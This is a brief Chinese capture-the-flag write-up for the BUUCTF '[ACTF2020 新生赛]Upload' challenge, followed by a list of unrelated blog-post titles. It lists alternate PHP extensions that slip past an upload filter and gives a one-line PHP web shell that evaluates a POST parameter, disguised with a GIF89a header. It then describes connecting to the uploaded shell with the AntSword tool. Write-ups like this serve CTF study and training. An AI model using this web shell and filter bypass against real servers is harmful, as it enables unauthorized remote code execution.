buuctf web [ACTF2020 新生赛]Upload

明了但不明显的文件上传

传个试试

行,抓包吧,php格式不行,就先上传要求的格式:jpg、png、gif

抓到上传的包之后,再修改成我们想要的

常见的php格式绕过有:php,php3,php4,php5,phtml,pht

挨个试试

这是上个图片题上传的木马,没有改格式,让上传图片,最好加上(GIF89a)

一句话木马:GIF89a

<script language="php">eval($_POST'cmd');</script>

上传成功,它也把保存的路径告诉你了

掏出蚁剑大宝贝梭哈就完了

flag

相关推荐
小小小小宇17 小时前
前端端内H5调试方法与原理
前端
铁皮饭盒17 小时前
bun 和 pnpm 谁硬? 谁软?
前端·后端
sTone8737517 小时前
Electron 进程架构模型
前端·electron
ZC跨境爬虫17 小时前
跟着 MDN 学CSS day_25:(高级区块效果)
前端·css·html·tensorflow·媒体
Bug-制造者17 小时前
前端流式输出完全指南:原理、实现与工程化实践
前端
暴躁小师兄数据学院17 小时前
【AI大模型应用开发工程师特训笔记】第04讲(第7章):函数与模块
前端·人工智能·python
跟着珅聪学java17 小时前
ECharts subtext(副标题)边距开发教程
前端·javascript·echarts
哈撒Ki17 小时前
快速入门 Electron
前端·面试·electron
还有多久拿退休金18 小时前
LLM应用开发一:给失忆的大模型装上"脑子"——LangChain.js对话记忆从零实战
前端·llm
思考着亮18 小时前
1.window.location.href 和 router.push 跳转方式
前端